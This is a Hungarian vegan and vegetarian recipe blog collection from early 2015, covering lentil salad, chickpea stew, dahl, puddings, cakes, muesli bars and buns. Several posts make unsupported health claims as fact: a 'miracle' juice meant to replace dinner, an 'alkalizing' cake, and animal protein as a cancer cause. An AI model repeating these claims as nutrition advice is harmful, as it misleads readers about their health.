Jelképes értelemben drága étel a lencse, mivel a bibliai időkben elsőszülöttségi jogot "vett rajta" (inkább cserélt) Jákob Ézsautól: "Jákob egyszer valami főzeléket főzött, amikor Ézsaú elfáradva megjött a mezőről. Mondta Ézsaú Jákobnak: Engedd, hogy ehessem a veres ételből, mert fáradt vagyok. Jákob pedig mondta: Add el hát nékem azonnal a te elsőszülöttségedet. Mondta Ézsaú: Íme, én halni járok, mire való hát nékem az én elsőszülöttségem? Mondta Jákob: Esküdjél meg hát nékem azonnal, és megesküdött néki és eladta az ő elsőszülöttségét Jákobnak. Akkor Jákob adott Ézsaúnak kenyeret, és főtt lencsét, evett, ivott, és felkelt, elment. Így vetette meg Ézsaú az elsőszülöttséget." (részlet 1. Mózes 25. fejezetéből)
Ugyan a történetben vörös lencse szerepel, én barna lencsét használtam a következő laktató salátához.
A recept:
Hozzávalók:
- 2 bögrényi babérleveles, sós vízben megfőtt lencse
- 1 szója joghurt
- 1 teás kanál mustár
- 1/3 póréhagyma
- 1-2 édes paprika
- 1-2 alma
- szükség esetén só
Elkészítés:
A joghurtot mustárral összekeverjük. A póréhagymát felkarikázzuk, felaprítjuk a paprikát, felkockázzuk az almát. A lehetőleg korábban beáztatott, majd puhára főzött lencsét, valamint a hagymákat, paprikákat és az almát a joghurtos-mustáros szósszal összekeverjük. Ha nem elég sós, kicsit megsózzuk és kész is a joghurtos-lencsesalátánk. Laktató étel önmagában is. Zöld salátaleveleket (pl. jégsaláta vagy fejes saláta) is fogyaszthatunk hozzá, segíti az emésztést. Puffadást okozhat, ha nem viszünk be elég nyers zöldet mellé.
Csicseriborsó pörkölt citromos cukkinis barna rizzsel
2015. február 22. Zöld Avocado
Nemrégiben kaptam egy kedves ismerősömtől - aki nem mellesleg szakács - egy saját fejlesztésű receptet. Ez egy currys babos csicseriborsó recept. Erről egyből eszembe is jutott, hogy a szegény csicseriborsó, milyen mostohagyerek is az én konyhámban. A vegetáriánusok egyik legfontosabb fehérje forrása ez a hüvelyes, mely Magyarországon is egyre népszerűbb. csicseriborsó pörkölt cukkinis rizzselSajnos elég sokáig kell főzni, ezért nagyon ritkán készítek belőle ételt. :-( Ezen változtatnom kell! ;-) A csicseriborsó egy makacs hüvelyes, de megéri, mert miután megadja magát, ellátja a szervezetünket mindenféle földi jóval. :-) A szakértők szerint 1 kg csicseriborsó pontosan annyi fehérjét tartalmaz, mint 1 kg pulyka mell. A különbség az, hogy az egyik növényi fehérje (könnyebben emészthető, és értékesebb), míg a másik állati fehérje (egyes kutatások szerint az állati fehérje is felelős lehet a rákos sejtek és egyéb népbetegségek elszaporodásáért. Lásd.: Kína tanulmány). És nem utolsó sorban 1 kg csicseriborsó, sokkal olcsóbb, mint 1 kg pulykamell. :-D csicseriborsó pörkölt cukkinis rizzsel,,A csicseriborsó kevés kalóriát tartalmaz, de gazdag B1-, B6-vitaminban és folsavban, valamint E-vitamin és karotin is található benne. Ásványi anyag tartalma is kedvező, sok magnéziumot, vasat és cinket tartalmaz. Fehérjében és rostokban gazdag, így segíti emésztésünket és kiválóan alkalmas a székrekedés megelőzésére, kezelésére is. Csökkenti a koleszterinszintet, ezáltal a szív- és érrendszeri megbetegedések kialakulásának kockázatát is. Alacsony aglikémiás indexe, így cukorbetegek számára különösen ajánlott a rendszeres fogyasztása. Vastartalma növeli az energiánkat, és kimondottan fontos alapanyag menstruáló és terhes nők, vérszegények, növésben lévő gyerekek számára.Antioxidáns tulajdonsága is ismert. Forrás: http://www.hazipatika.com Előkerestem egy régebbi receptemet, amit most megosztok veletek. Ha már húspótlóként emlegetik, akkor készítsünk belőle valami tipikusan húsos ételt, ezúttal húsmentesen! ;-) CSICSERIBORSÓ PÖRKÖLT CUKKINIS BARNA RIZZSEL csicseriborsó pörkölt cukkinis rizzsel HOZZÁVALÓK: (kb. 4 személyre) - 200 g száraz csicseriborsó - 1 fej vöröshagyma - extra szűz olíva olaj - 1/2 db piros húsú paprika - 1 db nagy érett paradicsom - fűszerek: Himalája só, frissen őrölt fekete bors, piros paprika fűszer, 1 ek mustár, kevés erős (pl.: erős pista, Cayenne bors, erős paprika... kinek mi van otthon) - 2 marék friss petrezselyem - 2 db bio ételízesítő (leves) kocka - 1,5 bögre barna rizs - 1 db közepes cukkini - 1/2 citrom leve ELKÉSZÍTÉS: A csicseriborsót egy nappal (24 órával) előtte beáztatom, hogy könnyebben megpuhuljon főzés közben. A pörkölt alaphoz: 1 fej vöröshagymát olíva olajon megdinsztelek. Hozzáadok 1 fél felkockázott piros húsú paprikát, és a paradicsomot. Kicsit lepirítom a zöldségeket, majd felöntöm kb. 2 dl vízzel. Sózom, borsozom, bőven pirospaprikázom a pörkölt alapot. Mehet még bele ételízesítő kocka, mustár, egy kevés erős (kinek mi van otthon), és egy maroknyi frissen vágott petrezselyem. Az egészet összeforralom, majd hozzáadom az előre beáztatott (az áztató vízétől mentes) csicseriborsót. Felengedem annyi vízzel, hogy ellepje az egészet. Ha szükséges még teszek hozzá piros paprikát, és fedő alatt kb. 1 óra alatt puhára főzöm. (Főzés közben, ha elfő a víz, folyamatosan utána kell tölteni). Miközben fő a ,,pörkölt, elkészítjük a köretet. Én ezúttal a barnarizst választottam, mert már régen ettünk. Persze ezt is fel kellett dobni egy kicsit. ;-) A szokásos módon egy teflonos edényben kb.30 perc alatt megfőztem 1,5 bögre barna rizst, 1 bio ételízesítő kockával, és 3 bögre vízzel. Közben lereszeltem a nagy lyukú reszelőn 1 közepes cukkinit héjastul (előtte jól meg kell mosni). A lereszelt cukkinit enyhén sóztam, borsoztam, és egy marék friss petrezselyem zölddel, illetve egy fél citrom levével összekevertem. Állni hagytam az egészet (fűszeres cukkinit), míg a teljes étel elkészült, majd összeforgattam a rizzsel. A készre főtt pörköltet utó ízesíthetjük, ha szükséges. A cukkinis barnarizzsel, és egy kevés friss, ropogós jégsalátával tálalom a nagyon laktató, de könnyen emészthető ételt. csicseriborsó pörkölt cukkinis rizzsel Jó étvágyat hozzá! :-) Megjegyzés1: az említett currys babos csicseriborsó receptet is el fogom készíteni hamarosan, és akkor megosztom veletek is. Az a baj, hogy a curry egyáltalán nem tartozik a kedves ízek kategóriába nálam, de nyitott vagyok az újításokra! Ez a blog nektek szól, nem magamnak! :-) Megjegyzés2: a képen látható pörköltben tofu kockák is fürdenek, melyek egy korábbi ételből maradtak meg, és a csicseriborsó pörköltben landoltak.
Gluténmentes almás pancake gesztenyekrémmel és málnával
2015. február 19. Éltető ételek
Ebéd után egy gyors édességre vágytam. A terv az volt, hogy almás legyen, gluténmentes és finom. Nos, szétnéztem a hűtőben, és ez lett belőle. Szerintem gyakran el fogom készíteni. Hozzávalók: - 5 dkg gesztenyeliszt - 5 dkg zabliszt - 1 teáskanál útifűmaghéj - 1 késhegynyi szódabikarbóna - kb. 15 dl risztej - 1 közepes alma - késhegynyi fahéj - késhegynyi vaníliapor - csipet só - kevéske kókuszvirágcukor vagy datolyavaj Gesztenyekrém: - cocomas kókuszkrém - cukrozatlan gesztenye (a Sparban szoktam venni) - kókuszvirágcukor - vaníliapor - málna vagy más savanykás gyümölcs Így készítsd el: Először is mérd ki a kétféle lisztet. Jó alaposan mosd meg az almát (én em-bioba beáztatom), majd nagylyukú reszelőn reszeld le. Add hozzá a fűszereket, majd öntsd hozzá fokozatosan a tejet. Jó sűrű, nokedli tészta állaga lesz. Hagyd picit pihenni. Egy serpenyőt melegíts fel, és kend ki egy pici kókuszolajjal. 1 evőkanálnyi mennyiséget halmozz a serpenyőbe, pár perc alatt süsd meg mindkét oldalát. Én rácsra szoktam tenni, hogy ne párásodjon be. A krémhez egyszerűen keverd össze az alapanyagokat. Kóstolgasd, ízesítsd kedved szerint. Rétegezd egy tányérra a palacsintát. Kend meg krémmel, majd tegyél rá málnát. Jó étvágyat.
Csőben sült brokkolis karfiol vegán módra
2015. február 17. Éltető ételek
Nos... megint brokkoli és karfiol. De nem tudok ráunni, szeretem minden formában. Ennek a receptnek az ötlete innen származik, viszont kissé átalakítva vegánosítottam azt. Hozzávalók: - 1 kisebb fej karfiol - 1 kisebb brokkoli - 1 batáta (édesburgonya) - 1 dl köles - 2-3 gerezd fokhagyma - 1-2 kávéskanál mustár - 1 evőkanál kókuszolaj vagy bio vaj - késhegynyi gyömbérpor - só, bors, chili Elkészítése: - A brokkolit és a karfiolt szedjük rózsáira és alaposan mossuk meg. - Sós vízbe főzzük meg, de csak roppanósra! A karfiolt picit tovább kell főzni, mint a brokkolit. - Közben 3x mennyiségű vízben főzzük meg az előzőleg alaposan átmosott kölest. - A köleshez öntsünk egy kevéske főzővizet, majd botmixerezzük krémesre. Olyan tejföl állaga legyen. - Reszeljük bele a fokhagymát, a zsiradékot és a mustárt. Fűszerezzük. - Egy jénai tál aljára tegyük a meghámozott, felkarikázott batátát. Tegyük rá a brokkoli és a karfiol darabokat. - Ezt öntsük le a kölesöntettel. - Tegyük be a sütőbe, és mintegy 30 perc alatt süssük össze.
Narancsos sütőtök puding
2015. február 16. Éltető ételek
Már van az oldalon egy másik tökpuding, csak az sárgabarackos. Itt a narancs kellemesen savanykás ízével varázsoltam harmóniát. Hozzávalók (2 adag): - 20 dkg tisztított sütőtök - 1/2 kisebb narancs leve - 1-2 csepp narancsolaj - 1/2 kávéskanál vaníliapor - 2-3 evőkanál kölesliszt - ízlés szerint édesítésre: juharszirup vagy méz - díszítésre: dió, piros gyümölcs - csipet só Elkészítése: A sütőtököt kockázzuk fel, majd éppen annyi vízbe főzzük meg, amennyi ellepi. Amikor megfőtt, botmixerezzük, majd ha szükséges, egy kevéske vizet (vagy pl. kókusztejet) öntsünk hozzá. Szórjuk hozzá a köleslisztet, főzzük meg. Adjuk hozzá az édesítőszert is. A végén csavarjunk bele egy fél narancs levét, és pár csepp narancsolajat cseppentsünk bele. Szedjük ki tálkákba, majd szórjunk a tetejére kevés diót, majd díszítsük piros gyümölccsel.
Kókuszkrémes zabkása fahájas pirított dióval
2015. február 15. Éltető ételek
Egy hirtelen "felindulásból" született ez a recept. A minap készítettem kókuszkrémes piskótaszívet, és még maradt egy kevéske kókuszkrém a doboz aljában. Így belekevertem ezt a finomságot a kásába, ez lett belőle. Hozzávalók: - 1/2 bögre zabpehely - 1,5 bögre víz, növényi tej keverék - 1/2 mokkáskanál ceyloni fahéj - 1/2 mokkáskanál vaníliapor vagy házilag készített vaníliacukor - 1 marék dió - 1 alma - kókuszvirágcukor - 2-3 evőkanál cocomas kókuszkrém Elkészítése: Egy lábasba tegyük fel főni a növényi tejes vizet. Adjunk hozzá egy csipet sót, vaníliát és fahéjat. Amikor fő a víz, öntsük bele a zabpelyhet. Kb. 10 perc alatt jó tejberizs állaga lesz, és megpuhul a zabpehely is.Vegyük le a tűzről, és keverjük bele a kókuszkrémet. Ha szükséges, édesítsük akár datolyavajjal vagy mézzel/kókuszvirágcukorral.Közben a diót törjük kis darabokra, és száraz serpenyőben pirítsuk meg. Szórjunk rá úgy 1 teáskanál kókuszvirágcukrot, fahéjat, majd keverjük hozzá a kis kockára vágott almát is.Egy tálkába tegyük az almás-dió felét, majd a kókuszos zabkása és a tetejére ismét az almás dió.
Kakaós-mogyoróvajas valentin napi süti
Gondolom ti is érzitek már a tavaszt a levegőben. Végre süt a nap, csicseregnek a madarak, rügyeznek a fák. Holnap itt a valentin nap, ami egy jó alkalom arra, hogy kifejezzük szeretetünket a számunkra kedves embereknek. Tehetjük ezt virággal, pár kedves szóval, ágyba vihetjük a reggelit, vagy készíthetünk számára valami finomságot. Én szinte mindig az utóbbit választom. Ez a sütemény egy egyszerű, könnyen elkészíthető recept. Ezeket szeretem a legjobban. Hozzávalók: 2 bögre durvára őrölt zabpehely 1 bögre tönkölyliszt (teljes kiőrlésű/finom) 3 ek. holland kakaópor 1 csomag foszfátmentes sütőpor 1 ek.nádcukor őrölt vanília 2 ek. kókuszzsír 1,5 bögre zabtej fél üveg mogyoróvaj 2 ek. agavé szirup fél citrom leve A 2 bögre zabpelyhet én aprítóval őröltem meg, de természetesen használhatunk zabpehelylisztet is akár. Aki édesszájú, az több cukorral vagy sziruppal is készítheti. A mogyoróvaj nálam szintén házi készítésű volt (hamarosan ezt is megosztom), de a bolti is megfelel. Házi szederlekvárral tálalom! :) 1. A zabpelyhet és liszet jól elkeverem a többi száraz hozzávalóval. 2. A kókuszzsírt megolvasztom a zabtejjel, majd hozzáadom a lisztes keverékhez. Hozzáadom a citromlevet, az agavé szirupot és a mogyoróvajat. 3. Jól elkeverem, összedolgozom a masszámat, majd egy rövid ideig állni hagyom, hogy a zabpehely megszívhassa magát. 4. Sütőpapírral kibélelt tepsire egy evőkanál segítségével kis halmokat rakunk, majd 180 fokra előmelegített sütőben 15-20 perc alatt kisütjük őket. Langyosan a legfinomabb, de 1-2 napig dobozba téve puha marad. Ani Tisztán,tudatosan!
Narancsolajos-csokis müzliszelet 1.0
2015. február 9. Éltető ételek
Müzlit már készítettem aszalóban, mely elkészítése legalább 12 órát vesz igénybe. Nos, ez egy jóval egyszerűbb recept, mivel ez sütőben süthető. Az 1.0 a verziószámra utal, mert biztos vagyok benne, hogy lesznek még próbálgatások, változtatások rajta. Nem mintha ezzel a verzióval gond lenne, nagyon finom lett, csak egy kicsit nehézkes a szeletelése. Jól le kell hűteni, valamint legközelebb vékonyabbat fogok készíteni. Ez majdcsak 2 cm-es lett, míg a bolti társai olyan 1 cm vastagságúak. Az eredeti recept 40 dkg mézet írt, én rögtön lecsökkentettem ezt a felére, de nekem még így is egy kicsit édes lett. Hozzávalók: - 10 dkg kókuszreszelék - 10 dkg aprószemű zabpehely - 10 dkg dió - 10 dkg napraforgómag - 5 dkg szezámmag - 5 dkg tökmag - 20 dkg méz - 12 dkg bio vaj - fahéj, vaníliapor - narancsolaj - tetejére: fél tábla 70%-os keserűcsoki felolvasztva, 3-4 csepp narancsolaj Elkészítése: - A száraz összetevőket keverjük össze egy tálba. - Olvasszuk össze a mézet a vajjal, majd fakanállal jó alaposan keverjük a magokhoz. - Egy sütőformába tegyünk egy zsírpapírt, majd jó alaposan nyomkodjuk bele a masszát. Nekem ez 2 cm vastagságúra sikeredett, de lehet ennél vékonyabb is. - Melegítsük elő a sütőt 180 fokra, majd süssük meg a müzlit. Légkeverés nélkül, hogy 20 perc alatt pirulni kezd a teteje. Figyeljünk rá, hogy ne égjen meg! - Hagyjuk teljesen kihűlni, majd még a hűtőbe is betehetjük, hogy jól összeálljon. - Közben vízgőz felett olvasszuk fel a csokit, és cseppentsük bele a narancsolajat. Ezt kenjük a müzli tetejére. - ismét tegyük be a hűtőbe, hogy a csoki jól rádermedjen. - Szeleteljük fel kívánt méretre.Igazi finom uzsonna nemcsak gyerekeknek.
Csípős sárgaborsó dahl
Íme, egy újabb recept, mely kiváló ürügy arra, hogy pszichoterápiás jelleggel a nagyközönség elé tárjam gyermekkorom legemlékezetesebb traumáját. Amikor ugyanis borsólevessel próbáltak etetni, az bizony hasonló megrázkódtatást jelentett számomra, mintha egy negédes hangú katolikus pap bébiszitterkedett volna mellettem, akit sutyiban kandúrbandinak kellett volna szólítanom. Ezek után a sárgaborsóhoz fűződő asszociációimat nem is taglalnám bővebben, maradjunk annyiban, hogy még extrémebbek voltak. Nem tudok elég hálás lenni az indiai konyhának azért, amiért eloszlatta előítéleteimet. (Mármint a borsóval kapcsolatban.) Pl. a következő gasztronómiai Tadzs Mahal jóvoltából, melynek hozzávalói:
1,5 dl sárgaborsó (lehet, hogy kevésnek tűnik, de nem az, tudniillik már áztatás közben háromszoros méretűre nő) 1,5-2 dl sűrített paradicsom 1 zöld erős paprika 1/2 kiskanál ánizs 1/2 kiskanál őrölt koriander 1/2 kiskanál reszelt gyömbér vagy gyömbérpor 1 kiskanál curry egy csipet őrölt görögszéna egy csipet asafoetida 1 hüvely kardamom őrölve só Folyamat: A környezetünkben tartózkodó éhes emberek kedélyállapotát a végletekig fokozzuk azáltal, hogy közöljük velük: 6-7 órára beáztatjuk a sárgaborsót. Sajnos elkerülhetetlen lépés, enélkül ugyanis főzés után is ennyire kemény lesz. Ezután kb. 1l vízben felrakjuk főni. Jó húsz perc elteltével egy másik edényben olajat hevítünk, és hozzáadjuk az apróra vágott hegyes erőspaprikát. Ha félig-meddig megpirult, hozzáadjuk a fűszereket az alábbi sorrendben: római kömény, ánizs, koriander, asafoetida, görögszéna. (Célszerű kis lángon, ne hogy megégjenek.) Ezután jöhet a sűrített paradicsom, majd a kardamom, a gyömbér és a curry. Ezt az elegyet hozzápasszítjuk a sárgaborsóhoz, majd alkalmanként megkevergetve puhára főzzük. Legvégül alattomosan megsózzuk.
Lapos has koktél
2015. február 4. Gréta konyhája
Nem fog ki rajtunk a tél, hiszen ilyenkor is van zeller, alma és gyömbér, amivel megállíthatjuk a vizesedést, a haspuffadást, és a további kilók ránk rakódását, ha kipréseljük levüket. Én negyedik hete iszom ezt a juice kombinációt minden este, néha kiegészítem még bébispenóttal, petrezselyemmel, répával, vagy céklával is. A zeller nagyon jó vízhajtó, és naran csbőr takarító is, a gyömbér segíti az emésztést, gyorsítja az anyagcserét, és energiát ad. Az alma, meg alma. Csodaszer! Az eredmény, lapos, tónusos has(persze ehhez torna is szükséges!), jobb közérzet, könnyebb és gyorsabb emésztés, kirobbanó energia, és ragyogó bőr. Még mindig cukormentesen, és már nem is hiányzik.
Koktél: Préselj ki 3 alma ujjnyi firss tisztított gyömbér, és 5-6 halványító zellerszál levét. Érdemes este, vacsora helyett fogyasztani, így a juice nem terheli meg az emésztőrendszert, mégis táplálja, és tisztítja alvás közben.
Jó étvágyat!
Valentin-napi torta
A szeretet saját készítésű tortába öntve. (Oké, ez egy karácsonyi sütemény remake-je :) ) Nem lehet elég korán készülni akár gondolatban is a szerelmesek világnapjára (még kerek 10 nap van addig). Lehet az ember akár 10 éves házas (én ugyanis az vagyok), de a szerelem akkor is igen virágzó tud lenni, különösképpen, ha "lángjai tűznek lángjai, az Úrnak lángjai". Persze sokan vannak, akik lényegesen rövidebb vagy sokkal hosszabb ideje örülhetnek egymásnak. Ez a vegán torta minden szerelmesnek finom ajándék lehet, legyen az egy frissebb vagy egy régóta tartó meghitt kapcsolat. Készítsük el meglepetésként szívünk párjának! :)
A recept
Hozzávalók:
A torta tésztája:
- 1 bögre liszt (1/3 része teljes kiőrlésű, 2/3 része fehér liszt
- 1 teáskanál szódabikarbóna vagy foszfátmentes sütőpor
- 1 evőkanál édesítő (kókuszvirág-cukor/gyümölcscukor/nyírfacukor, stb)
- 1 evőkanál karobpor vagy kakaópor
- 1/2 vanília belseje
- 2 evőkanál napraforgó olaj
- kb 1 bögre víz
Elkészítés:
Először a száraz alapanyagokat keverjük össze (liszt, szódabikarbóna/sütőpor, édesítő, karob por, vanília kikapart belseje), annyi vizet öntünk hozzá, ami által piskóta-szerű tésztát kapunk. Ekkor keverünk hozzá még egy kevés olajat. Kb. 20 perc alatt készre sütjük a sütőpapírral kibélelt szív-formában. A megsült tésztát kiszedjük a formából, s miután kihűlt, kettévágjuk, megtöltjük a sütés közben elkészített krémmel. A torta szélét is megkenjük ezzel a krémmel. Karobos/kakaós csokiszószt kanalazunk a tetejére, végül kókusszal megszórjuk az oldalát. Hidegen tároljuk néhány órát vagy egy éjszakát, majd fogyasztható is. Ha marad még krém, a tetejét akár a képen látható módon is díszíthetjük.
Kókuszos krém:
- 1/2 liter rizstej (rizstejpor - gazdagon - és víz, vagy dobozos rizstej, vagy saját készítésű risztej)
- 10 dkg kókuszreszelék
- vanília belseje
- reszelt citromhéj
- 3-4 evőkanál édesítő (kókuszvirág-cukor/gyümölcscukor/nyírfacukor, stb)
- 2-3 evőkanál kukoricakeményítő
- 3 evőkanál lágy kókuszzsír
A krém elkészítése:
A rizstejet feltesszük főzni, és elkeverjük benne a lereszelt citrom héját, a kikapart vaníliát, a kókuszreszeléket és az édesítőt. A kukoricakeményítőt kb. 1/2 dl vízzel simára keverjük, és a rizstejhez keverjük folyamatos keverés közben. Miután besűrűsödött, mint a puding, levesszük, és langyosra hűtjük. Mielőtt kihűlne, beletesszük a kókuszzsírt. Egy kevés frissen facsart citromlevet is adhatunk hozzá.
Csokimáz:
- 2 evőkanál karobpor vagy kakaórpor
- 2 evőkanál édesítő (kókuszvirág-cukor/gyümölcscukor/nyírfacukor, stb)
- 2 evőkanál kókusz zsír
- 3-4 evőkanál növényi tej
A máz elkészítése:
A kókuszzsírt megolvasztjuk, beleszórjuk a karobport, vagy kakaópor, hozzáadunk ízlésünknek megfelelő mennyiségű édesítőt (nádcukor, nyírfacukor, stb.) Alacsony lángon forráspontig keverjük, majd növényi tejet is hozzáadunk. Addig kevergetjük, míg újra forrni kezd, lezárjuk, kihűtjük, majd a sütemény tetejére kenjük.
Gránátalmás - zöldcitromos krémes álom
Ezzel a tortával neveztem A Nyers Kihívás versenyére. Próbáltam olyan tortát készíteni ami lúgosító hatású, és csak kevés gyümölcscukrot tartalmaz....szerettem volna, hogy szép színes legyen, amilyenek általában az élő ételek, na meg krémes- habos...sajna este fotóztam, így a kép minősége nem az igazi, de készítsétek el Ti is és nézzétek meg mennyire szép színes, és finom krémes...! :) Gránátalmás - zöldcitromos krémes álom: Az alap: 130 gramm mandulapép 30 gramm kókusz lisztté őrölve 9 csepp stevia 4 evőkanál kakaópor kiskanál fahéj késhegynyi vanília 1 citrom reszelt héja csipet só ha szükséges pici víz vagy mandulatej Krém: 2 avokádó 2 banán 7 evőkanál kókuszzsír 2 zöldcitrom leve 10 csepp stevia Krém felét megszínezni, 2 marék gránátalma leve, 1 szelet cékla leve Dísz: gránátalma és kivi Elkészítés: Mandulatejet készítettem, beáztatott mandulát turmixoltam vízzel. Ezt leszűrtem, kinyomkodtam mosózacskóban, majd a mandulapépből kimértem 130 grammot. Ehhez kevertem a többi hozzávalót. Kicsit száraz volt, nem állt össze olyan szépen, így még öntöttem hozzá 2 evőkanál mandulatejet. A kapott masszát csatos forma aljára nyomkodtam. Felszeltem a kivit a forma szélére helyeztem. Turmixgépbe dobtam a krém hozzávalóit, kivéve a gránátalma és a cékla levét. A zöld krém felét beleöntöttem a formába, a maradékot turmixoltam, a piros lével, majd ezt a torta tetejére kentem. Hűtőben pihent 1- 2 órát. Megszórtam gránátalma maggal majd megettem. Ez egy lúgosító torta, kevés gyümölcscukorral. A stevia miatt nagyon kellemes, nem az a tipikus édes sütemény. Aki jobban szereti édesen, használhat, datolyát, vagy mézet a stevia helyett. Egészségetekre! smile hangulatjel
Tejbergízes-mogyorókrémes-fügés desszert
2015. február 1. Mindennapi ételeink
Új hónap, új receptek:-). Ez egy reggelink volt, Fanni nagy-nagy örömére. :-) Hozzávalók: 65 dkg búzadara 0,5 dl zabtej -- adagonként 1 ek. karobos, xilites mogorókrém 2-3 szem füge Elkészítés: A növényi tejet felforraljuk, beleszórjuk a búzadarát és sűrűre főzzük. Egy tálkát megkenünk vízzel, Beleteszünk két kanál tejbegrízt, erre helyezünk egy ek. mogyorókrémet, majd ismt a tejbegríz következik, majd felaprított füge, ismét tejbegríz. Megvárjuk, amíg kihűl. Majd kiforgatjuk, és a tetejére is halmozunk mogyorókrémet és fügét.
Karobos chia puding
2015. január 30. Gréta konyhája
25 napja nem ettem semmilyen cukrot, gyümölcsön kívül. Ez nem azt jelenti, hogy le kellene mondanunk az édes nyalánkságokról, sőt! Ilyenkor lódul meg az ember fantáziája, mert a semmiből valamit csinálni, na az, már művészet. :)) Mivel ma sokat dolgoztam, és keményen edzettem is, úgy éreztem megérdemli a gyomorom is a kényeztetést. Ezért két ek chia magot beáztattam 3 ek kókusztejbe, vártam pár percet, míg nyákossá válik, majd egy aprító mixerbe tettem 1 nagy érett banánt, hozzáadtam a nyákos chia magot, és 2 ek karob port. Egy perc alatt összeturmixoltam, és egy másodperc alatt, már kanalaztam is a mennyei csokikrémet. Tökéletes nassolni való! Ismered a chia magot? Nem? Akkor itt az ideje! Itt minden infót megtalálsz róla: http://chia-mag.hu/
Sütőtök(ös)magos bucik
A sütőtökkel csak pár éve vagyok jó barátságban. Mivel a férj szereti, a kedvéért gyakrabban készítek krémlevest belőle. Újabban rizstejszínnel öntöm fel, vagy némi kesudiót turmixolok meg hozzá. Ma az előbbivel készült. Délelőtt a jó időben sokat kinn voltunk a fiammal, megcsodáltuk, hogy kibújtak a téltemetők!!! Jeget törtünk, meg diót is, beszélgettünk a 9x éves szomszédasszonnyal, aki olyan fürgén kocog át a másik oldalunkon lakó barátnőjéhez, mintha hússzal kevesebbszer élte volna meg a születésnapját. A rossz diókat (nem az avas, hanem a megrágott, stb) Ábel szépen elhordta a madaraknak, így neki is meg volt a program. Délben alvás. Gondoltam utána felkerekedünk, és veszünk "kiflizsömlét" Apának a másnapi szendvicséhez. Az időjárás másképp gondolta, altatás közben beborult, és mire lejöttem ebédelni, elkezdett hullani a hó. Erre mi meg úgy, hogy akkor a maradék sütőtököt hasznosítjuk, és zsömle lesz belőle. Lett is, csak inkább buci féle. Ketten sütöttük, Ábel szemmel kísérte a kenyérsütő ténykedését, majd a lábát lógatva üldögélt a konyhaszekrényen, miközben a tésztát formáztam. Még egy darabbal gyurmázott is, de aztán ideadta, hogy tegyem bele a többibe. Illetve lelkesen siettetett, a "Megesszük" kijelentéseivel. Este meg is tette egy kisebb darabbal és avokádóval. (Növekedési fázisban van, ma egyébként 7x evett, ha az esti szopit nem számítom, és még közben nassolt is némi kesudiót és datolyát. A normál napi 4 étkezés nála.) No, de térjünk vissza a bucikhoz. A liszt mennyisége a sütőtök vizességétől függően nőhet, de a tésztánk a szokásos kenyértésztánál jóval lágyabb. Hozzávalók: 80 dkg liszt (60 dkg tk tönköly, 20 dkg sima liszt) 300 ml növényi tej (nekem most 150 ml szója, 150 ml víz, ennyi volt itthon) 240 g sütőtök 100 g tökmag 100 ml olivaolaj 1 tk só 1 kk méz/gyümölcscukor 2 g élesztő Ha van kenyérsütő gépünk, az összes hozzávalót beletesszük a gépbe, és megdagasztatjuk. Ha nincs, az olajat a liszttel, sóval, elmorzsoljuk. Beleszórjuk a tökmagot. Közben az élesztőt a langyos mézes tejben felfuttatjuk, és a liszthez öntjük. Az egészet alaposan megdagasztjuk, míg rugalmas, egynemű tésztát nem kapunk. Kicsit kelesztjük, majd átgyúrjuk, kinyújtjuk lisztes deszkán ujjnyi vastagra. A tetejét megkenjük némi olivaolajjal, tenyérnyi darabokat vágunk, amit feltekerve buci/kifli formára igazítunk. Ha nincs kedvünk ezzel kínlódni, vagy sietünk, a kenés ki is maradhat, két centisre kinyújtjuk a tésztát, és 12 db téglát vágunk belőle. Mindet zsírpapírral kibélelt tepsire rakjuk, és bő fél órát kelesztjük. Közepes hőfokon 35-40 perc alatt ropogósra sütjük. Mire tisztességes kép készült volna... (egyébként színhelyes :) ) Jött a minőség-ellenőrzés...
Magyaros zöldségpörkölt
Még mielőtt egy szót is ejtenék a következő ételről, következzék minden idők leghasznosabb és leginkább hiánypótló videója arról, hogyan kell kenyeret pirítani. (A széria alkotói már dolgoznak a "Hogyan forraljunk vizet?", "Hogyan vegyünk levegőt orrnyíláson keresztül?", valamint a "Hogyan nézzünk ki az ablakon?" című oktatóvideókon is.)
Most pedig a szakma alacsonyabb szintjeit boncolhatnám: Mostanában megannyi levelet kaptam kistérségi háziasszonyoktól, hogy a Mónika vegyeskereskedésben nem találnak tofut, csicseriborsót, római köményt, úgyhogy jobb híján a családnak kelkáposzta- és sóletkonzervből próbálnak kiügyeskedni valami egzotikus reformkaját. Az ő kedvükért következzék egy olyan tradicionális cucc, melyhez elegendő a kertbe kiugraniuk. Főleg most, a bográcsszezon kellős közepén. Komponensek: 1 fej vöröshagyma 2 gerezd fokhagyma 1 cukkini 3 db közepes méretű krumpli 1 marék vörösbab 3-4 fej tetszőleges gomba (galócafélék, valamint az olyan vadhajtások, mint a hipóban pácolt csiperke, kerülendőek) 2 sárgarépa 1 kaliforniai paprika 1 hegyes erőspaprika 1 evőkanál édes fűszerpaprika 1 kiskanál édes paprikakrém 1 kiskanál őrölt kömény 1 kiskanál Vegamix vagy hasonló ételízesítő só, bors A hagymát felkockázzuk, majd olajon a belenyomott fokhagymával üvegesre dinszteljük. Amíg ez el nem készül, távcsövön figyeljük a nádasban a búbos vöcskök násztáncát. Ha közben rajtakapjuk a Tutajost, hogy puskánkat vállához emeli, akkor emelt hangon rákérdezünk, hogy ezzel mégis mire akar célozni! A hagymás alaphoz hozzáadjuk a fűszereket és a paprikakrémet, majd elkeverjük és hozzápasszítjuk a felkockázott/felkarikázott zöldségeket. (Ha konzervbabot, illetve konzervgombát használunk, azt ráérünk lecsepegtetve a végén hozzáadni.) Miután többször megkevertük, kis vizet adunk hozzá, és addig pároljuk fedő alatt szolid lángon, amíg a krumpli és a sárgarépa meg nem puhul. Végül megsózzuk, borsozzuk. A Csikasz nem kap belőle, mer az pedigrépált eszik.
Kókuszos kölessüti házi szilvalekvárral
2015. január 26. Éltető ételek
